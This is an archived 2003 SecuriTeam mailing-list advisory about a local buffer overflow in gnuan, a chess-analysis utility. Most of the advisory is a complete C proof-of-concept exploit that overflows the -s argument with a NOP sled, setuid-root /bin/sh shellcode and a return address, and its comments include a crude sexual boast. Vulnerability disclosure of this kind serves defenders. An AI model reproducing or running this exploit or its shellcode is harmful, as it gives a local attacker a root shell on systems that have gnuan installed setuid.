[EXPL] gnuan Buffer Overflow Vulnerability (Exploit, -s)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/07/03
- Previous message: SecuriTeam: "[EXPL] gnuchess Buffer Overflow Vulnerability (Exploit, -s)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 7 Jul 2003 18:31:56 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
gnuan Buffer Overflow Vulnerability (Exploit, -s)
------------------------------------------------------------------------
SUMMARY
gnuan, a utility that produces an analysis of a chess game, has been found
to contain a locally exploitable buffer overflow. The following exploit
code can be used to test your system for the mentioned vulnerability.
DETAILS
Exploit:
/*
STX SECURITY LABS:
5358gnuanx0r.c - x86 local buffer overflow exploit
proof of concept code by: ace [ ace@static-x.org ]
vulnerability discovered by: t0asty [ t0asty@static-x.org ]
Description:
gnuan produces an analysis of a chess game. For each move it shows the
move,
the score and the principle variation selected by gnuchess.
Vulnerability:
A buffer overflow vulnerability is present in gnuan.
A segmentation fault occurs when 580 bytes of data are sent to
the binary using the -s switch. The data overwrites the EIP therefore
it allows us to control the pointer, allowing us to execute code.
Versions vulnerable:
[-] All versions are believed to be vulnerable.
Tested on: Red Hat 7.3 with the latest version.
************************************************
* Note: gnuan may not be suid on all systems. *
************************************************
StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
X X
X STX ONLINE [ www.static-x.org ] X
X X
StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
************************************************
* Note: our pen0rs are 50 x larger than yours. *
************************************************
*/
#include <stdio.h>
char stxcode[] =
/* ace's shellcode [ ace@static-x.org ] (setuid=0,/bin/sh) */
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x03\x5e\xeb\x05\xe8\xf8\xff"
"\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x50\x80\x36\x01\x46\xe2\xfa\xea"
"\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01\x54"
"\x88\xe4\x82\xed\x11\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xb6"
"\x11\x01\x01\x8c\xb2\x2f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01"
"\x88\x74\xf9\x8c\x4c\xf9\x30\xd3\xb9\x0a\x01\x01\x01\x52\x88\xf2"
"\xcc\x81\x5a\x5f\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91";
unsigned long pen0r(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv) {
int pos; int ace = pen0r(); int stxnop = 0x90;
int stxbytes = 576; int stxtotal = stxbytes + 4;
char *stxbof;
stxbof = (char *)malloc(stxbytes);
for(pos = 0; pos < stxbytes; pos++) {*(long *)&stxbof[pos] = stxnop;}
*(long *)&stxbof[stxbytes] = pen0r();
memcpy(stxbof + stxbytes - strlen(stxcode), stxcode, strlen(stxcode));
system("clear");
printf("#####################################\n");
printf("# [ STX SECURITY LABS ] #\n");
printf("# gnuan local poc exploit by: ace #\n");
printf("#####################################\n\n");
printf("[+] Return Address: 0x%x\n", ace);
printf("[+] Buffer Size: %d\n", stxtotal);
printf("[-] /usr/bin/gnuan -s pwned!\n\n");
execl("/usr/bin/gnuan", "gnuan", "-s", stxbof, NULL);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:ace@static-x.org> STX
SECURITY LABS.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] gnuchess Buffer Overflow Vulnerability (Exploit, -s)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
